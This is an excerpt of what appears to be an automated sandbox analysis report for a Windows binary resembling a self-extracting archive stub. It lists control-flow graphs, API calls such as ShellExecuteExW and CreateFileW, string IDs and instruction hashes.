                                                                                    control_flow_graph 838 73d78f-73d7a7 call 73ec50 841 73d9e8-73d9f0 838->841 842 73d7ad-73d7b9 call 743e13 838->842 842->841 845 73d7bf-73d7e7 call 73fff0 842->845 848 73d7f1-73d7ff 845->848 849 73d7e9 845->849 850 73d812-73d818 848->850 851 73d801-73d804 848->851 849->848 853 73d85b-73d85e 850->853 852 73d808-73d80e 851->852 854 73d810 852->854 855 73d837-73d844 852->855 853->852 856 73d860-73d866 853->856 857 73d822-73d82c 854->857 858 73d9c0-73d9c2 855->858 859 73d84a-73d84e 855->859 860 73d868-73d86b 856->860 861 73d86d-73d86f 856->861 864 73d81a-73d820 857->864 865 73d82e 857->865 866 73d9c6 858->866 859->866 867 73d854-73d859 859->867 860->861 862 73d882-73d898 call 72b92d 860->862 861->862 863 73d871-73d878 861->863 874 73d8b1-73d8bc call 72a231 862->874 875 73d89a-73d8a7 call 731fbb 862->875 863->862 868 73d87a 863->868 864->857 870 73d830-73d833 864->870 865->855 872 73d9cf 866->872 867->853 868->862 870->855 873 73d9d6-73d9d8 872->873 876 73d9e7 873->876 877 73d9da-73d9dc 873->877 884 73d8d9-73d8dd 874->884 885 73d8be-73d8d5 call 72b6c4 874->885 875->874 883 73d8a9 875->883 876->841 877->876 880 73d9de-73d9e1 ShowWindow 877->880 880->876 883->874 887 73d8e4-73d8e6 884->887 885->884 887->876 889 73d8ec-73d8f9 887->889 890 73d8fb-73d902 889->890 891 73d90c-73d90e 889->891 890->891 892 73d904-73d90a 890->892 893 73d910-73d919 891->893 894 73d925-73d944 call 73dc3b 891->894 892->891 895 73d97b-73d987 CloseHandle 892->895 893->894 902 73d91b-73d923 ShowWindow 893->902 894->895 908 73d946-73d94e 894->908 896 73d989-73d996 call 731fbb 895->896 897 73d998-73d9a6 895->897 896->872 896->897 897->873 901 73d9a8-73d9aa 897->901 901->873 905 73d9ac-73d9b2 901->905 902->894 905->873 907 73d9b4-73d9be 905->907 907->873 908->895 909 73d950-73d961 GetExitCodeProcess 908->909 909->895 910 73d963-73d96d 909->910 911 73d974 910->911 912 73d96f 910->912 911->895 912->911
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0073D7AE
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0073D8DE
                                                                                    • ShowWindow.USER32(?,00000000), ref: 0073D91D
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0073D959
                                                                                    • CloseHandle.KERNEL32(?), ref: 0073D97F
                                                                                    • ShowWindow.USER32(?,00000001), ref: 0073D9E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                    • String ID: .exe$.inf$PDu<s$hs$rs
                                                                                    • API String ID: 36480843-1355383514
                                                                                    • Opcode ID: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                    • Instruction ID: 02014bd91de949bd77be2867eede28e845855f5427e9e2b43baca96f0aae550a
                                                                                    • Opcode Fuzzy Hash: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                    • Instruction Fuzzy Hash: CE5115704083849AFB319B24F8447AB7BE4EF41744F04481EF9C5971A2E7BDAE84CB52

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 913 74a95b-74a974 914 74a976-74a986 call 74ef4c 913->914 915 74a98a-74a98f 913->915 914->915 922 74a988 914->922 917 74a991-74a999 915->917 918 74a99c-74a9c0 MultiByteToWideChar 915->918 917->918 920 74a9c6-74a9d2 918->920 921 74ab53-74ab66 call 73fbbc 918->921 923 74a9d4-74a9e5 920->923 924 74aa26 920->924 922->915 928 74aa04-74aa15 call 748e06 923->928 929 74a9e7-74a9f6 call 752010 923->929 927 74aa28-74aa2a 924->927 931 74aa30-74aa43 MultiByteToWideChar 927->931 932 74ab48 927->932 928->932 939 74aa1b 928->939 929->932 938 74a9fc-74aa02 929->938 931->932 936 74aa49-74aa5b call 74af6c 931->936 937 74ab4a-74ab51 call 74abc3 932->937 943 74aa60-74aa64 936->943 937->921 942 74aa21-74aa24 938->942 939->942 942->927 943->932 945 74aa6a-74aa71 943->945 946 74aa73-74aa78 945->946 947 74aaab-74aab7 945->947 946->937 950 74aa7e-74aa80 946->950 948 74ab03 947->948 949 74aab9-74aaca 947->949 951 74ab05-74ab07 948->951 953 74aae5-74aaf6 call 748e06 949->953 954 74aacc-74aadb call 752010 949->954 950->932 952 74aa86-74aaa0 call 74af6c 950->952 955 74ab41-74ab47 call 74abc3 951->955 956 74ab09-74ab22 call 74af6c 951->956 952->937 966 74aaa6 952->966 953->955 969 74aaf8 953->969 954->955 968 74aadd-74aae3 954->968 955->932 956->955 970 74ab24-74ab2b 956->970 966->932 971 74aafe-74ab01 968->971 969->971 972 74ab67-74ab6d 970->972 973 74ab2d-74ab2e 970->973 971->951 974 74ab2f-74ab3f WideCharToMultiByte 972->974 973->974 974->955 975 74ab6f-74ab76 call 74abc3 974->975 975->937
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00745695,00745695,?,?,?,0074ABAC,00000001,00000001,2DE85006), ref: 0074A9B5
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0074AA3B
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0074AB35
                                                                                    • __freea.LIBCMT ref: 0074AB42
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • __freea.LIBCMT ref: 0074AB4B
                                                                                    • __freea.LIBCMT ref: 0074AB70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                    • Instruction ID: 7f37725bf5e6a976cc39e8797b82f27c825e60fc7df7d1e590850cfb0bd01f99
                                                                                    • Opcode Fuzzy Hash: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                    • Instruction Fuzzy Hash: 6251C2B2A90216BFDB258F64CC45EBFB7AAEB44750F158629FC04E6150EB7CDC40C692

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 978 743b72-743b7c 979 743bee-743bf1 978->979 980 743bf3 979->980 981 743b7e-743b8c 979->981 982 743bf5-743bf9 980->982 983 743b95-743bb1 LoadLibraryExW 981->983 984 743b8e-743b91 981->984 987 743bb3-743bbc GetLastError 983->987 988 743bfa-743c00 983->988 985 743b93 984->985 986 743c09-743c0b 984->986 990 743beb 985->990 986->982 991 743be6-743be9 987->991 992 743bbe-743bd3 call 746088 987->992 988->986 989 743c02-743c03 FreeLibrary 988->989 989->986 990->979 991->990 992->991 995 743bd5-743be4 LoadLibraryExW 992->995 995->988 995->991
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00743C35,?,?,00782088,00000000,?,00743D60,00000004,InitializeCriticalSectionEx,00756394,InitializeCriticalSectionEx,00000000), ref: 00743C03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                    • Instruction ID: 66293837ffbdd4c5feff7a2beaadf5f5e1e23625a8acd709d41ff33465036034
                                                                                    • Opcode Fuzzy Hash: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                    • Instruction Fuzzy Hash: 0C110A71A44724ABDB228B589C41B997764EF017B1F214210E919FB1D0E778EF00C6D5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                    • SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                    • String ID: riched20.dll$3Ro
                                                                                    • API String ID: 3498096277-3613677438
                                                                                    • Opcode ID: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                    • Instruction ID: e4302c4fcd413434adc3b52dea4dfb802fc5bf0eb7adf3e60b0f7d47a2ea3927
                                                                                    • Opcode Fuzzy Hash: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                    • Instruction Fuzzy Hash: 9EF06DB1D40249ABCB10AFA9D8499EFFFFCEF84B00F10411AE801E2241CBB856058FA1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1000 7298e0-729901 call 73ec50 1003 729903-729906 1000->1003 1004 72990c 1000->1004 1003->1004 1005 729908-72990a 1003->1005 1006 72990e-72991f 1004->1006 1005->1006 1007 729921 1006->1007 1008 729927-729931 1006->1008 1007->1008 1009 729933 1008->1009 1010 729936-729943 call 726edb 1008->1010 1009->1010 1013 729945 1010->1013 1014 72994b-72996a CreateFileW 1010->1014 1013->1014 1015 7299bb-7299bf 1014->1015 1016 72996c-72998e GetLastError call 72bb03 1014->1016 1018 7299c3-7299c6 1015->1018 1020 7299c8-7299cd 1016->1020 1022 729990-7299b3 CreateFileW GetLastError 1016->1022 1018->1020 1021 7299d9-7299de 1018->1021 1020->1021 1023 7299cf 1020->1023 1024 7299e0-7299e3 1021->1024 1025 7299ff-729a10 1021->1025 1022->1018 1026 7299b5-7299b9 1022->1026 1023->1021 1024->1025 1027 7299e5-7299f9 SetFileTime 1024->1027 1028 729a12-729a2a call 730602 1025->1028 1029 729a2e-729a39 1025->1029 1026->1018 1027->1025 1028->1029
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00727760,?,00000005,?,00000011), ref: 0072995F
                                                                                    • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072996C
                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00727760,?,00000005,?), ref: 007299A2
                                                                                    • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299AA
                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                    • String ID:
                                                                                    • API String ID: 1999340476-0
                                                                                    • Opcode ID: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                    • Instruction ID: 1b6f19a3c46cc2595d0c2fb992b1259eaab68bdd6ee7cbe26e97a77fe32fab3f
                                                                                    • Opcode Fuzzy Hash: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                    • Instruction Fuzzy Hash: 66314730544351AFE7309F20DC4ABDABB94BB84330F180B1DF6E5961D1D3B8A994CB95

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1059 73b568-73b581 PeekMessageW 1060 73b583-73b597 GetMessageW 1059->1060 1061 73b5bc-73b5be 1059->1061 1062 73b599-73b5a6 IsDialogMessageW 1060->1062 1063 73b5a8-73b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                    • IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                    • TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                    • DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                    • Instruction ID: 34fbeba6c67362867dedf975606f2b57194c11b039f836d05e6573a69e36e2ab
                                                                                    • Opcode Fuzzy Hash: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                    • Instruction Fuzzy Hash: 0CF0BD71A4121AABDB209BE5DC4CDDB7FACEE056917008515B905D2011EB7CD605CBB5

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1064 73abab-73abca GetClassNameW 1065 73abf2-73abf4 1064->1065 1066 73abcc-73abe1 call 731fbb 1064->1066 1068 73abf6-73abf9 SHAutoComplete 1065->1068 1069 73abff-73ac01 1065->1069 1071 73abe3-73abef FindWindowExW 1066->1071 1072 73abf1 1066->1072 1068->1069 1071->1072 1072->1065
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0073ABC2
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0073ABF9
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0073ABE9
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 4243998846-3080729518
                                                                                    • Opcode ID: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                    • Instruction ID: 9e707f7cff5f428269232dc02ef85828e818e1deb724869cc846f144d02d6223
                                                                                    • Opcode Fuzzy Hash: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                    • Instruction Fuzzy Hash: E1F0277270122977EB2097289C0AFDBB36C9F46F00F488021BE40F30C0D768DE4186BA

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1073 73dbde-73dc09 call 73ec50 SetEnvironmentVariableW call 730371 1077 73dc0e-73dc12 1073->1077 1078 73dc36-73dc38 1077->1078 1079 73dc14-73dc18 1077->1079 1080 73dc21-73dc28 call 73048d 1079->1080 1083 73dc1a-73dc20 1080->1083 1084 73dc2a-73dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                    • Instruction ID: b726a5121e318d18a7d4fbc02c77a2f00548c85d8a72c286d05db2476097d8c9
                                                                                    • Opcode Fuzzy Hash: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                    • Instruction Fuzzy Hash: FBF0A7B2414628AAEB201BA59C0ABFA3B58AF05B82F040415BD8595052E7FC8D40D6B0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1085 729785-729791 1086 729793-72979b GetStdHandle 1085->1086 1087 72979e-7297b5 ReadFile 1085->1087 1086->1087 1088 729811 1087->1088 1089 7297b7-7297c0 call 7298bc 1087->1089 1090 729814-729817 1088->1090 1093 7297c2-7297ca 1089->1093 1094 7297d9-7297dd 1089->1094 1093->1094 1095 7297cc 1093->1095 1096 7297ee-7297f2 1094->1096 1097 7297df-7297e8 GetLastError 1094->1097 1098 7297cd-7297d7 call 729785 1095->1098 1100 7297f4-7297fc 1096->1100 1101 72980c-72980f 1096->1101 1097->1096 1099 7297ea-7297ec 1097->1099 1098->1090 1099->1090 1100->1101 1103 7297fe-729807 GetLastError 1100->1103 1101->1090 1103->1101 1105 729809-72980a 1103->1105 1105->1098
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00729795
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007297AD
                                                                                    • GetLastError.KERNEL32 ref: 007297DF
                                                                                    • GetLastError.KERNEL32 ref: 007297FE
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                    • Instruction ID: 3a29b4a343e19ecfef2b72bef6ad6c8147ebf741f3b8c9e2e045e91557f53e9f
                                                                                    • Opcode Fuzzy Hash: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                    • Instruction Fuzzy Hash: FA11A130910324EBDF205F64E804AAA37A9FB42361F1C8929F75AC5290D7BCDE44DB61
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00743F73,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue), ref: 0074AD66
                                                                                    • GetLastError.KERNEL32(?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000,00000364,?,007498B7), ref: 0074AD72
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000), ref: 0074AD80
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                    • Instruction ID: 59d2eaa357bbebc2975bd999039dde6b4b0319591fb33787e0ba8f78740fdf41
                                                                                    • Opcode Fuzzy Hash: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                    • Instruction Fuzzy Hash: F4014732B81322BBC7224A689C44A977B58EF057B3B214220F816D76A4D72CC801CEE5
                                                                                    APIs
                                                                                      • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                      • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                      • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                      • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                      • Part of subcall function 0074BB4E: _abort.LIBCMT ref: 0074BB80
                                                                                      • Part of subcall function 0074BB4E: _free.LIBCMT ref: 0074BBB4
                                                                                      • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                    • _free.LIBCMT ref: 0074BA9F
                                                                                    • _free.LIBCMT ref: 0074BAD5
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast_abort
                                                                                    • String ID: pu
                                                                                    • API String ID: 2991157371-250260183
                                                                                    • Opcode ID: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                    • Instruction ID: cfb9399e4d8e20f99b5139816d8264b8a6e4398f5f53c066edaadf546eec4a38
                                                                                    • Opcode Fuzzy Hash: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                    • Instruction Fuzzy Hash: 40310B31A04209EFDB14DFA8D845BAD77F5EF41320F218499E9149B2A2EB7ADE40DB50
                                                                                    APIs
                                                                                      • Part of subcall function 0074BF30: GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
                                                                                      • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
                                                                                      • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
                                                                                      • Part of subcall function 0074BF30: _free.LIBCMT ref: 0074BF95
                                                                                      • Part of subcall function 0074BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
                                                                                    • _free.LIBCMT ref: 007482AE
                                                                                    • _free.LIBCMT ref: 007482B5
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                    • String ID: 0"x
                                                                                    • API String ID: 400815659-575046572
                                                                                    • Opcode ID: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                    • Instruction ID: 1f5f410fc78f00ec7d8363e5c4a4ce0d6744abc99434c38bd5af54256bcf67f6
                                                                                    • Opcode Fuzzy Hash: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                    • Instruction Fuzzy Hash: 43E02B33B0AD46D192E132792C0E62F0640AFC5339B150326F910CB0D3CF9C880749E7
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 2s$PDu<s
                                                                                    • API String ID: 1269201914-970619881
                                                                                    • Opcode ID: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                    • Instruction ID: 404acd75d1b5149ccec74ce83a993814fd043e799aaaf8cd7df92e79f0e8113f
                                                                                    • Opcode Fuzzy Hash: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                    • Instruction Fuzzy Hash: 6FB012C1698140FD3104610C1C06E7F011DC0C1F15730503EF804C00C2E88C0D440531
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: (s$PDu<s
                                                                                    • API String ID: 1269201914-480722381
                                                                                    • Opcode ID: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                    • Instruction ID: 8c3f68ee1192d28e84e4889f7785a324503899e73897345fa36affa9fc99bde5
                                                                                    • Opcode Fuzzy Hash: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                    • Instruction Fuzzy Hash: C0B012C1698180FC3104610C1D06D7F051DC0C1F15730903EF804C41C2E88C0D450531
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0072D343,00000001,?,?,?,00000000,0073551D,?,?,?), ref: 00729F9E
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0073551D,?,?,?,?,?,00734FC7,?), ref: 00729FE5
                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0072D343,00000001,?,?), ref: 0072A011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                    • Instruction ID: 46c150bdda7b7cf7929623cd94886d940c2c756e5fd408c3845fee3693d7e2ac
                                                                                    • Opcode Fuzzy Hash: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                    • Instruction Fuzzy Hash: 5331F531204325AFDB24CF20E918BAEB7A5FF84711F04491DF945972D0D779AD48CBA2
                                                                                    APIs
                                                                                      • Part of subcall function 0072C27E: _wcslen.LIBCMT ref: 0072C284
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A2D9
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A30C
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2260680371-0
                                                                                    • Opcode ID: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                    • Instruction ID: d988740ed4147f4d3f7a55bc1516873b143104bc78932567a80fe9c76939ddc8
                                                                                    • Opcode Fuzzy Hash: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                    • Instruction Fuzzy Hash: 91019E21600370BBEF21EA756C09BEE2388AF0A781F044454F901E6092EB6CDA8186B6
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0074B8B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                    • Instruction ID: 06c1d71436392f7e9da060732aff4b4c16c8b0011b2980c483bd48c4042029b9
                                                                                    • Opcode Fuzzy Hash: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                    • Instruction Fuzzy Hash: 2441C6B050438CEADB218E688C84BF6BBADEB55304F1444EDE6DA86142D379EE45DB60
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0074AFDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
